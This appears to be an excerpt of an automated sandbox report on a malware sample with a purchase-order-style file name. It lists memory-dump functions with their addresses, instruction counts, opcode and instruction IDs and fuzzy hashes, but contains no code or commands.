Instruction ID: 04da83f3a142c78c1c65197e4abaee31b88f13e7d19b1b8c6bc464504283baac
Opcode Fuzzy Hash: 2eb261f2bcf48edc67715285733ff1c1e09f368907e38ec296b922bce44d09ad
Instruction Fuzzy Hash: 3151E674A10218CFDB14DF64D844B9EBBF2FB49301F1491A5E809A73A4E734AD86DF10

Function 05B06532 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ee1042f40f0ddd47d295f32048b17386e253d04a5efa02694748f08fd42dd7
Instruction ID: 9f14086315ec153f0622e013eff4082ee86e98ddaaf78c28154f50cca43ae9a2
Opcode Fuzzy Hash: 83ee1042f40f0ddd47d295f32048b17386e253d04a5efa02694748f08fd42dd7
Instruction Fuzzy Hash: 5551F078D04219CFCB60DF68D854BEDBBB2BB09300F1091AAD449A7395DB346E86DF10

Function 05B0A55C Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17093d1cce2ae343724cd890f8780c01ba02a880aada97d4d226d38adc6e952c
Instruction ID: 9c2f2362fc5a16455ff5929681230a850d4f9ebc536fad4b354bb3ce25f9935b
Opcode Fuzzy Hash: 17093d1cce2ae343724cd890f8780c01ba02a880aada97d4d226d38adc6e952c
Instruction Fuzzy Hash: 33411A75918358CFDB00CFA8C848BEEBBF2BB4A300F14A5A5D419AB395E734A945DF11

Function 05B0618F Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30eb9f264d991530f350c71e2ef834b5c842cf8630fe62b85a5b17a80b6c2ed
Instruction ID: 78f103355e2343f9e41f88f20e2ecd0d1f6d8894d2cb0d9c7d07d3b150a1bab4
Opcode Fuzzy Hash: d30eb9f264d991530f350c71e2ef834b5c842cf8630fe62b85a5b17a80b6c2ed
Instruction Fuzzy Hash: A851D078D04219CFCB60DF68D854BEDBBB2BB09300F1091A9E449A7395DB346A85DF50

Function 05B064FD Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ce9385d67d0bead325c190bff7f3bfce1dea117e0249341a7fdf7b86555fb1
Instruction ID: cf8f07101eb48563d488b8c91975b03a505524500e6810d434fd5e5ba53c1724
Opcode Fuzzy Hash: f0ce9385d67d0bead325c190bff7f3bfce1dea117e0249341a7fdf7b86555fb1
Instruction Fuzzy Hash: F651E178D04229CFCB60DF68D894BADBBB2FB49300F1091A9E449A7394DB346E85DF40

Function 05B02DAF Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8c64db706c81ed15d4c46279f6ed67546be3daac1d724982e42ba05d01e6cf
Instruction ID: ddea809a7552f365ac19a1c12836150d1def24cdb308f982dc314f65a6ab4f71
Opcode Fuzzy Hash: 2b8c64db706c81ed15d4c46279f6ed67546be3daac1d724982e42ba05d01e6cf
Instruction Fuzzy Hash: E2418078949218DFCB10DFA4E8497ECFFB5FB4A301F1065EAD545A7282DB30694ACB41

Function 05B0632B Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640b8b4b012a1d431b2d055557dee049860249f6ab051571fed3300b97e9758a
Instruction ID: 28ced9240db873ddb0bcf2c17d1847c3976a34c92b077a6a09c484f98fa14bc4
Opcode Fuzzy Hash: 640b8b4b012a1d431b2d055557dee049860249f6ab051571fed3300b97e9758a
Instruction Fuzzy Hash: 8C51D278D04229CFCB60DF64D854BEDBBB2BB49300F1091AAD549A3395DB346E85DF50

Function 05B0618A Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7767a655aa9d2de655a18c2b402606a3393beccf563c7d14aa900fbbc244481f
Instruction ID: d2e9b0e371aad3aeb57dbbacb3100f2d29e4cab09f0f4d6477119ceaaa793f08
Opcode Fuzzy Hash: 7767a655aa9d2de655a18c2b402606a3393beccf563c7d14aa900fbbc244481f
Instruction Fuzzy Hash: 2A51D074E04229CFCB64DF69D854BADBBB2BB49300F1091AAD449A3394DB346E86DF50

Function 05B0A3D0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af0277079d2666132382e0b32511c7095876f40306001cf16b93a3f0110ae2b
Instruction ID: b7983f13f283c7a0b12a66cf4d5c9a19ef32adb824632d0e98f2548a2a091052
Opcode Fuzzy Hash: 2af0277079d2666132382e0b32511c7095876f40306001cf16b93a3f0110ae2b
Instruction Fuzzy Hash: 0041E474904318CFDF10CFA8C844BAEBBF2FB49311F1495AAD819A7294EB34A985DF11

Function 05B10006 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ffc5bc645408492ba1a80b925d475b62e98b19a65d43bd87180fb7253ba131
Instruction ID: 7e9b059e9784f61b74f18138727f51295463301bd0666fd9cc0e2f9aa5c3dfe5
Opcode Fuzzy Hash: 78ffc5bc645408492ba1a80b925d475b62e98b19a65d43bd87180fb7253ba131
Instruction Fuzzy Hash: EF414B34A053588FEB65DB24C854F99BBB1BF0A310F1101D9E905EB3E2D635AD85CF50

Function 05B1A690 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26806518bdb887fbdc5202c91f74ac007a55d4c8d6a07473eb839470e222dafe
Instruction ID: ff30accc02e5f5f6e5d9a4163c7f76c8dfbb4576f70d4af8ff58709454927a1a
Opcode Fuzzy Hash: 26806518bdb887fbdc5202c91f74ac007a55d4c8d6a07473eb839470e222dafe
Instruction Fuzzy Hash: 553108366115049FCB45DF68D888EA9BBB2FF49320F0640A8F9099B372C731ED55DB84

Function 05B0A268 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a76de2879becf1f199ffa6dc9e912549e171615bc791576ee8f7f87d19f2369
Instruction ID: bbbb43e751f6eb59a45530c5f9e1869d2bc633f1298cf34f4d7b66490e1e88e3
Opcode Fuzzy Hash: 3a76de2879becf1f199ffa6dc9e912549e171615bc791576ee8f7f87d19f2369
Instruction Fuzzy Hash: AF41D474A14318CFDB54DFA8D844BAEBBF2FB49301F1490A5E409A73A4E734A989DF10

Function 05B1D060 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf38e8ed3daa9256728ec87d680e6274bd7297304765f7e16a69fbaeb4aa3d1e
Instruction ID: ac66cc1a521b0c86ed2e1a24a1e370e577cfbff9133412c313956390ca1f295b
Opcode Fuzzy Hash: bf38e8ed3daa9256728ec87d680e6274bd7297304765f7e16a69fbaeb4aa3d1e
Instruction Fuzzy Hash: E0415035A002099FDB05DBA4D855BEEBBB1FF89310F2480A6D901B73A4CB35AD15DBA0

Function 0584D5F8 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb570bfb523f5a81e7a0b8796e833604957579416a750f364db734ebc52cd6e8
Instruction ID: 12c97b69fb81999af57279313f6b1b2bb3ed5425c56e33549c5b89d9d592a67e
Opcode Fuzzy Hash: fb570bfb523f5a81e7a0b8796e833604957579416a750f364db734ebc52cd6e8
Instruction Fuzzy Hash: 2131E1B17103158FDB209B69E889B6EBBAAFFC4314F104529ED4ACB644DF74AC018B95

Function 00D20810 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57a242a77dd516bf16fae5bbee71945b786b9bc80f08055a366f59ae8eaabc2
Instruction ID: a9a0944dccbf208029b58fc5aec74b792ec149cc273652c3469c4d36e34fcc53
Opcode Fuzzy Hash: c57a242a77dd516bf16fae5bbee71945b786b9bc80f08055a366f59ae8eaabc2
Instruction Fuzzy Hash: BD21F931B003318FDB29A738A85462A7FD2AFA9769B184466D505CB266EE21DC06C7E1

Function 05B07718 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbce982c7ce5ddf2753e44a8ccdebaaf5ba348af17e59e37df609852804340fb
Instruction ID: c3251e6d91eafe2b5c60c829ab47898fcef694bc6bd1d001625290dd8c8eefd2
Opcode Fuzzy Hash: cbce982c7ce5ddf2753e44a8ccdebaaf5ba348af17e59e37df609852804340fb
Instruction Fuzzy Hash: 2B419F70D55208CFDB24DFA8C444BADBFB2FF48345F2490A9D419A72A5DB746986CF10

Function 0584B5B0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf101aa6bd3efd8085ecda43af242fc7d1819ad518371cde41488691a1851156
Instruction ID: 084927cbb42d15c4cabcc083a3051e7f7d597c47365e51d249937da7a1f88040
Opcode Fuzzy Hash: cf101aa6bd3efd8085ecda43af242fc7d1819ad518371cde41488691a1851156
Instruction Fuzzy Hash: 77414474E10209CFCB04DFAAD445BAEBBF2FB89302F148069D815A7364DB349946CF90

Function 0584B5C0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe0ac070cfa84fa2ed01177904c1bfa18e8e70d1c9c590cb279bcf96c39ecc0
Instruction ID: 5cc7d63cd8541ef454cdd5fce47e5212e423321c6d3ddb2bccc5b90af00b6c1a
Opcode Fuzzy Hash: 5fe0ac070cfa84fa2ed01177904c1bfa18e8e70d1c9c590cb279bcf96c39ecc0
Instruction Fuzzy Hash: E4313374E1020DDFCB04DFAAD444AAEBBF6FB89306F148065D815A7354DB34A945DF90

Function 05B0A18D Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591add53e5a65912d4d98f3d1ff07831bd6f64729bbcb1d9341a2eef6d9c36ed
Instruction ID: f18019e7d76c324a35effc0fadc720b442f19c6b7bef3b5194ef9322eb722af9
Opcode Fuzzy Hash: 591add53e5a65912d4d98f3d1ff07831bd6f64729bbcb1d9341a2eef6d9c36ed
Instruction Fuzzy Hash: 2241E774A14318CFDB50DF68D844BAEBBF2FB49301F1490A5E809A7394D734A989DF11

Function 0584A678 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ed48f34c66bb90aa08d4d44414f90c3f3fccb03d9973f91610acc1b166e44e
Instruction ID: e11aa51acff27c318710429d426d93565244cad7694b3530b1d50cc92e65d46f
Opcode Fuzzy Hash: 69ed48f34c66bb90aa08d4d44414f90c3f3fccb03d9973f91610acc1b166e44e
Instruction Fuzzy Hash: BD310574E4021D8BDB18CFA9D844BEEBBF2BB88304F04812AD815BB250DB709945CF91

Function 05B18850 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f74708ca280732141dcd371e25939d3f5ea6028e658a3501a4ee3456fc9cc5
Instruction ID: 51e843b4a70113a91f7a37370d36f9b038a5f8f4802ab09b11847321b45c84e0
Opcode Fuzzy Hash: 19f74708ca280732141dcd371e25939d3f5ea6028e658a3501a4ee3456fc9cc5
Instruction Fuzzy Hash: A121F3327042008FE364CBA9E984A66BBA6FBC1325F5485BBE54EC7251DB31FC46C754

Function 0584B14B Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a24392332b08b9005eec167e772bc42c778645314f7e58238c242e5e402ab7a
Instruction ID: ac0fbd5583e856252c1ccae46520c49faf839ff14d76efbb39c904fca728b80a
Opcode Fuzzy Hash: 3a24392332b08b9005eec167e772bc42c778645314f7e58238c242e5e402ab7a
Instruction Fuzzy Hash: F531BE74A0521CCFDB50DF65D849BADBBB2FB4A306F20946AE809E7251C7709D89CF00

Function 05B0A486 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc33b4a93cb230cc498fddcd386871f8314aee7fb04d40ee4bac526f20901afe
Instruction ID: 15fc09d089346a616929869056cff1002ddd26f5bcba8e4a37f7c69a98c22e18
Opcode Fuzzy Hash: bc33b4a93cb230cc498fddcd386871f8314aee7fb04d40ee4bac526f20901afe
Instruction Fuzzy Hash: B541D374A04318CFDB10CFA4D844BEEBBB2FB09301F0495A5E809A7294E775A989DF10

Function 05B04870 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f35390028f1e27eb1e8869dc01a62f11ac474c1b6d6180193a85b6bb2bdeb3a
Instruction ID: 463d8b519e62e68b8831444324860f64388a2c382ef77473316fb5f7e7e32db5
Opcode Fuzzy Hash: 5f35390028f1e27eb1e8869dc01a62f11ac474c1b6d6180193a85b6bb2bdeb3a
Instruction Fuzzy Hash: 34316E70D04269CFDB24DF6AD944BEDBBF6FB89300F1090AAD509A7294DB346985CF40

Function 05B14310 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1505007eb622eca03ac20fd032dfb009941c19907aace2313bb5e4512fc9c7b3
Instruction ID: f7f36e9b1ec72007d10859e919c8134d0d85d1273f47b3be2909e00307a46b5e
Opcode Fuzzy Hash: 1505007eb622eca03ac20fd032dfb009941c19907aace2313bb5e4512fc9c7b3
Instruction Fuzzy Hash: C1319C312002058FDF15CF59D888BAA7BA6FF48305F5581A9FC068B2A1CB74E995CB90

Function 0584A448 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c142705efaf2801044cc1d5a23576fd2ffc8fd4f81862a3d24744b98fbf18e
Instruction ID: 1d0959a4618bb4412b6b45c7538a3714ab3b394ca70aee4d798447612879fb25
Opcode Fuzzy Hash: 35c142705efaf2801044cc1d5a23576fd2ffc8fd4f81862a3d24744b98fbf18e
Instruction Fuzzy Hash: B831E374D4920CDFDB08CFAAD8486AEBBF6BB89304F1480AAD815EB251D7384A40DF55

Function 0584A25A Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70cb60b0c9b954dfe7380fffcd2ff8d8e07d0b64242ba65249ce91a5b3c6d11e
Instruction ID: a8fc4765e30d07d2e702b9afe8d8e49be60c4d959c6b1afae33fe407416d6e71
Opcode Fuzzy Hash: 70cb60b0c9b954dfe7380fffcd2ff8d8e07d0b64242ba65249ce91a5b3c6d11e
Instruction Fuzzy Hash: 81311675E00208AFCB05DFA9D8516EEBBB6FF88300F14806AE916A7364DF315941CF90

Function 05B0A0BE Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c1f1c5581b4d61fa8bcf893f5a7e216c8490dbfc6d15f5812a72add8914545
Instruction ID: 420c5abc956eee02f2744cd964992700462bb0f9520df5597026359d04e7bbff
Opcode Fuzzy Hash: c6c1f1c5581b4d61fa8bcf893f5a7e216c8490dbfc6d15f5812a72add8914545
Instruction Fuzzy Hash: 3F31D574A04318CFDB00DFA4D844BDEBBF2FB09301F0495A5E809A7294D775A945DF14

Function 05B088D0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21a29593c75251b3eac502f52a2f38b386ef0c88c00280f269c689943c912c45
Instruction ID: 67762cb859c26a6d4f8db91beb78b5a2600d0e4c79bd97d1f3546ae23656cd00
Opcode Fuzzy Hash: 21a29593c75251b3eac502f52a2f38b386ef0c88c00280f269c689943c912c45
Instruction Fuzzy Hash: D441C674A11229CFCB54EF68D994BADBBB2FB49300F1080A9E549A7395DB306E85DF40

Function 05B1DE40 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8ce383e5f7d1207ee796131633c18e063481c62c81cc4ce2dd80990bb0e416
Instruction ID: 1e0443a898a6a042dc014e33fd7ee5bf3a9690472bcbc193c78b5af0bd61b2f1
Opcode Fuzzy Hash: 0b8ce383e5f7d1207ee796131633c18e063481c62c81cc4ce2dd80990bb0e416
Instruction Fuzzy Hash: 15219774B10A09CFCB44EF68C5548AEBBF5FFC9700B50456AD906A7360EF30AA46CB95

Function 00D21F48 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5330f566cd89bb3ff4d237070e14b39047a65812c0b2a20bb97b06c39b53bcf7
Instruction ID: b5ec6315962681f682733e2d78d4a54ce9f05a942a4db1f4adbb9f07aed9924c
Opcode Fuzzy Hash: 5330f566cd89bb3ff4d237070e14b39047a65812c0b2a20bb97b06c39b53bcf7
Instruction Fuzzy Hash: AF314B74D05218DFDB00EFA9D6487AEBBF1EF55305F24C0A6E014A7260D7748A869F21

Function 05B0A49E Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f8a04b42ce9b457b3a32cb337fbff71d692adfa4fd45272710ea685c2ec30c
Instruction ID: 0d91bdef6013be66dc36a4d8da2cb486d930275643260eb37c183464d73d6e13
Opcode Fuzzy Hash: 10f8a04b42ce9b457b3a32cb337fbff71d692adfa4fd45272710ea685c2ec30c
Instruction Fuzzy Hash: 5331D274A04318CFDB14CFA9D844BAEBBF2FB49301F1494A5E809A72A4E774A985DF14

Function 05B0A146 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c65e05b73c3d903e9ef0eba5c576c13fc5519f7d315339401fe6320364dc671
Instruction ID: bbe104a5191d918613d1eccfc51f24cac3f445f9057f48f8fdadcf1f6ee4e267
Opcode Fuzzy Hash: 2c65e05b73c3d903e9ef0eba5c576c13fc5519f7d315339401fe6320364dc671
Instruction Fuzzy Hash: B831B374A04318CFDF10DFA8C844B9EBBF2FB09301F1494A5E809AB294E775A989DF15

Function 00D21F58 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149ef746ecc012197fcb9bfbde0212c407018e4896679272bddf0f296b47042d
Instruction ID: ed53b1cf61a92a25adce525d2a72a6c1d51995ffa7fc1522dde3925c8492f859
Opcode Fuzzy Hash: 149ef746ecc012197fcb9bfbde0212c407018e4896679272bddf0f296b47042d
Instruction Fuzzy Hash: 54316B74D05218DFDB00EFA9D5487AEBBF1FF69305F20C0A6D015A7250D7348A459F21

Function 0584D500 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9824af10a1a7a8bbdf58a9cfcfd7c0f5fdfe1fc476ca5b6912f570ce8fbb711
Instruction ID: 8ccce118ad93609ec57c297b5f693cf5d002a1a4b2f12ebe62fe12c40cef5d2b
Opcode Fuzzy Hash: f9824af10a1a7a8bbdf58a9cfcfd7c0f5fdfe1fc476ca5b6912f570ce8fbb711
Instruction Fuzzy Hash: A721F831A103058FDB14EB25D84676D7BEAEB84300F004539E84ACB641EF75AD0A8BD5

Function 05B11B00 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b4ad7c9220dd63c37393198e9e54b99ccb27a4fba89f9a60626cf5d8a9e7a0
Instruction ID: 8ce6ecf465628d4d5a2be1d6325b2b9438c28e805d3d4feedae17afd2d967b0a
